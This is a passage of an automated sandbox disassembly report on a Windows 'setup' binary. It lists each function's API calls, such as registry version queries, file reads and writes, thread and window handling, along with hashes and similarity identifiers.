                                                                                                                                                                              • Opcode ID: f1f07109241e09d18b66d44d3d590559c54328799d4c1db03cac5af555db179a
                                                                                                                                                                              • Instruction ID: 7ca58ea169e09e871f0192fe11255ace1b7727abbf5ed2509e743566d20c8e79
                                                                                                                                                                              • Opcode Fuzzy Hash: f1f07109241e09d18b66d44d3d590559c54328799d4c1db03cac5af555db179a
                                                                                                                                                                              • Instruction Fuzzy Hash: EF71A478700318AADB209B31ED417AA73B5EB85744F19507BEF16A7791EB34CE4A8780

                                                                                                                                                                              Control-flow Graph
                                                                                                                                                                              • [Figure: control-flow graph of this function; legend: Executed / Not Executed]
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00CD114E
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00CD1195
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00CD11B4
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00CD11E3
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00CD1258
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 00CD12D2
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 00CD1324
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00CD13B8
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00CD13BF
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD13D3
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00CD13F6
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CD1437
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: QueryValue$AddressCloseCurrentHandleInit_thread_footerModuleOpenProcProcess
                                                                                                                                                                              • String ID: CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
                                                                                                                                                                              • API String ID: 1850716914-3583743485
                                                                                                                                                                              • Opcode ID: 01eaf0f576f914458d126d1959810686bb6b74adb398f754b66b56d53e5a7ed4
                                                                                                                                                                              • Instruction ID: c2669d488fa3aa0ae58072d52efb8afb448600c58d8726c738fadc3ff40ea3fd
                                                                                                                                                                              • Opcode Fuzzy Hash: 01eaf0f576f914458d126d1959810686bb6b74adb398f754b66b56d53e5a7ed4
                                                                                                                                                                              • Instruction Fuzzy Hash: 9791A1B1900328AEDB20CF21CC45B9AB7B5FB45710F0442A6E919B7290DB76AE98CF50

                                                                                                                                                                              Control-flow Graph
                                                                                                                                                                              • [Figure: control-flow graph of this function; legend: Executed / Not Executed]
                                                                                                                                                                              APIs
                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,00D7F98B,00E9FF20,?,00000000,?,?,00BB8C54,00000000), ref: 00D7F6A6
                                                                                                                                                                              • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00D7F98B,00E9FF20,?,00000000,?,?,00BB8C54,00000000), ref: 00D7F6BB
                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D7F737
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DecodePointer$LibraryLoad
                                                                                                                                                                              • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                                                                                                                                              • API String ID: 1423960858-1745123996
                                                                                                                                                                              • Opcode ID: 6c7ea14ebb6fc1a2ab71ed086a0c12438ea71510fb947d4f254933adc0ed0647
                                                                                                                                                                              • Instruction ID: 1878a13fe61e8571abf206f3c1c0bd547a3537c80196add050e96419a8ab82b8
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c7ea14ebb6fc1a2ab71ed086a0c12438ea71510fb947d4f254933adc0ed0647
                                                                                                                                                                              • Instruction Fuzzy Hash: 3B01C4317493007ADE2D5B109D47BE977548F12744F284070FC48BB2D6E6918589D2B5

                                                                                                                                                                              Control-flow Graph
                                                                                                                                                                              • [Figure: control-flow graph of this function; legend: Executed / Not Executed]
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000,02141699,00000000), ref: 00CF18D7
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CF1BD0
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CF1C31
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CF18E6
                                                                                                                                                                                • Part of subcall function 00CCEF90: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,02141699,?,00000000), ref: 00CCEFDB
                                                                                                                                                                                • Part of subcall function 00CCEF90: GetLastError.KERNEL32(?,00000000), ref: 00CCEFE5
                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 00CF19E4
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000000,00000000,00000000,00000001), ref: 00CF1A3B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$File$Read$FormatMessagePointer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3903527278-0

                                                                                                                                                                              Control-flow Graph (first block d119e0-d11a16; graph rendering not preserved)
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,02141699,?,00000000,?,?,?,?,?,?,00000000,00DF9C2D,000000FF), ref: 00D11A20
                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00D11D90,?,00000000,?), ref: 00D11A56
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00D11B60
                                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000000,?), ref: 00D11B6B
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00D11B8B
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,02141699,?,?,?), ref: 00D11BF4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateObjectSingleThreadWait$AllocateCloseCodeEventExitHandleHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3066744267-0

                                                                                                                                                                              Control-flow Graph (first block bb9f0b-bb9f14; graph rendering not preserved)
                                                                                                                                                                              APIs
                                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00BB9F20
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 00BB9F35
                                                                                                                                                                              • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 00BB9F4B
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 00BB9F65
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 00BB9F75
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$CallProc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 513923721-0

                                                                                                                                                                              Control-flow Graph (first block d1f650-d1f69b; graph rendering not preserved)
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,02141699,?,6CCF37E0,?), ref: 00D1F6B2
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,0000C800,0000C800,00000000,?,?,0000C800), ref: 00D1F748
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,0000C800), ref: 00D1F7BC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                              • String ID: Ls
                                                                                                                                                                              • API String ID: 1065093856-1452845052

                                                                                                                                                                              Control-flow Graph (first block cb08f0-cb0925; graph rendering not preserved)
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CB0962
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                                                                                              • String ID: h
                                                                                                                                                                              • API String ID: 2296764815-3790492082
                                                                                                                                                                              • Opcode ID: de4bfeb1e3e74266bca5d8b278f43247fee322f9fbc69d0e923a72c52baedafd
                                                                                                                                                                              • Instruction ID: 8ea8216e7fc8e76fe41194ddebfe873f97289ae1f71ca568da1c1879b515122a
                                                                                                                                                                              • Opcode Fuzzy Hash: de4bfeb1e3e74266bca5d8b278f43247fee322f9fbc69d0e923a72c52baedafd
                                                                                                                                                                              • Instruction Fuzzy Hash: 2301D4B1E04648DFC758EB59EC42B49B3A8E70EB20F24427AE426E33D0D735F9049A21

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 536 ccf980-ccf9b9 537 ccfaec call ba7d00 536->537 538 ccf9bf-ccf9d9 536->538 544 ccfaf1 call ba8830 537->544 540 ccf9db-ccf9e3 538->540 541 ccfa07-ccfa1a 538->541 545 ccf9e8-ccf9f3 call d7fd94 540->545 542 ccfa2c-ccfa2e 541->542 543 ccfa1c-ccfa24 541->543 547 ccfa30-ccfa41 call d7fd94 542->547 548 ccfa43 542->548 543->544 546 ccfa2a 543->546 553 ccfaf6-ccfb6a call d851ef call ccf120 * 2 SendMessageW * 2 544->553 545->553 558 ccf9f9-ccfa05 545->558 546->545 556 ccfa48-ccfa86 call d820e0 call d81b60 547->556 552 ccfa45 548->552 552->556 567 ccfa88-ccfa93 556->567 568 ccfab1-ccfad2 556->568 558->552 570 ccfa95-ccfaa3 567->570 571 ccfaa7-ccfaae call d7fd63 567->571 570->553 573 ccfaa5 570->573 571->568 573->571
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00CCFB54
                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CCFB5F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 51274aa91a6a2e53d5655ac03aa0aca4dd3d83236cc12c5494476ec920006c5c
                                                                                                                                                                              • Instruction ID: 36f591e9d807a5dbde62bb74558b5f8dab2d9234d4212bff62b17f7aee668486
                                                                                                                                                                              • Opcode Fuzzy Hash: 51274aa91a6a2e53d5655ac03aa0aca4dd3d83236cc12c5494476ec920006c5c
                                                                                                                                                                              • Instruction Fuzzy Hash: FC51A671A001149FDB14DF68CC85B6EFBA9EB85750F24427EE819DB385EA70AD0587E0
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindow.USER32(00000004), ref: 00C68BCA
                                                                                                                                                                              • DestroyWindow.USER32(00000004,?,?,?,?,?,?,?,?,000000FF), ref: 00C68BD7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Destroy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3707531092-0
                                                                                                                                                                              • Opcode ID: fc9c3770ff1350a2d644025c1313e9491fced6c14e69f17c577ac61358fdbbbb
                                                                                                                                                                              • Instruction ID: 15aa4f3498b644e51add9e869079975253b9a6d11a3b8e9976a132556b525e77
                                                                                                                                                                              • Opcode Fuzzy Hash: fc9c3770ff1350a2d644025c1313e9491fced6c14e69f17c577ac61358fdbbbb
                                                                                                                                                                              • Instruction Fuzzy Hash: E631CC70805649EFCB00DF69C94979EFBF4FF11710F1042AAD094A7A91DBB4AA08CB92
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00DA100A,?,00000000,?,?,00DA12AB,?,00000007,?,?,00DA16FD,?,?), ref: 00D98194
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00DA100A,?,00000000,?,?,00DA12AB,?,00000007,?,?,00DA16FD,?,?), ref: 00D9819F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                              • Opcode ID: 52c3c11485acdcc773b6a3eb6da319ad0b5bcd0eed7e64bc4703f1331383e545
                                                                                                                                                                              • Instruction ID: 179bde353eb97df2427a7582f1aa36c344393f1270de2a0cffffb762fc6cc8a3
                                                                                                                                                                              • Opcode Fuzzy Hash: 52c3c11485acdcc773b6a3eb6da319ad0b5bcd0eed7e64bc4703f1331383e545
                                                                                                                                                                              • Instruction Fuzzy Hash: 95E08631500614EFCF213FA5BC087897BA9DB01791F144010F908B7065CE35D885D7B4
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00E172AC,000000FF,00000000,00000000,?,?,00E172AC,00CDEF15,InstanceId), ref: 00CB4A08
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00E172AC,000000FF,?,-00000001), ref: 00CB4A3A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 626452242-0
                                                                                                                                                                              • Opcode ID: 61d857cfc27adc6f2a9855de86762207d36dc65b5c58354833ceb465469be092
                                                                                                                                                                              • Instruction ID: 0135706a8e9c6e92b4524ffd996cab5d948b49ad2263f5e729fab813eed28243
                                                                                                                                                                              • Opcode Fuzzy Hash: 61d857cfc27adc6f2a9855de86762207d36dc65b5c58354833ceb465469be092
                                                                                                                                                                              • Instruction Fuzzy Hash: AF110236309211AFD6149B49DC98F6EB7A9EFC0721F20821EF225A72D1CB316D01DBA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00D85304,00BAA726,?,00000000,?,?,8007000E,00BAA59F), ref: 00D97F2B
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,8007000E,00BAA59F), ref: 00D97FCD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                              • Opcode ID: 567cd4d7642bc1dae57d7662fd9d8ea26a0151911b833a4d40612c8c19990ea3
                                                                                                                                                                              • Instruction ID: 0f9845604d57b5349fec519b4752e4be5bef585b6bd6dd7a3e0ed5886a887b9a
                                                                                                                                                                              • Opcode Fuzzy Hash: 567cd4d7642bc1dae57d7662fd9d8ea26a0151911b833a4d40612c8c19990ea3
                                                                                                                                                                              • Instruction Fuzzy Hash: C1112B3121E2016EDF013FFAACC5D2B669DEF057747240239F108B21A2EA118C089171
                                                                                                                                                                              APIs
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,02141699,?,?,?), ref: 00D11BF4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ObjectSingleWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 24740636-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00CD1040: __Init_thread_footer.LIBCMT ref: 00CD10B6
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD0EA0
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
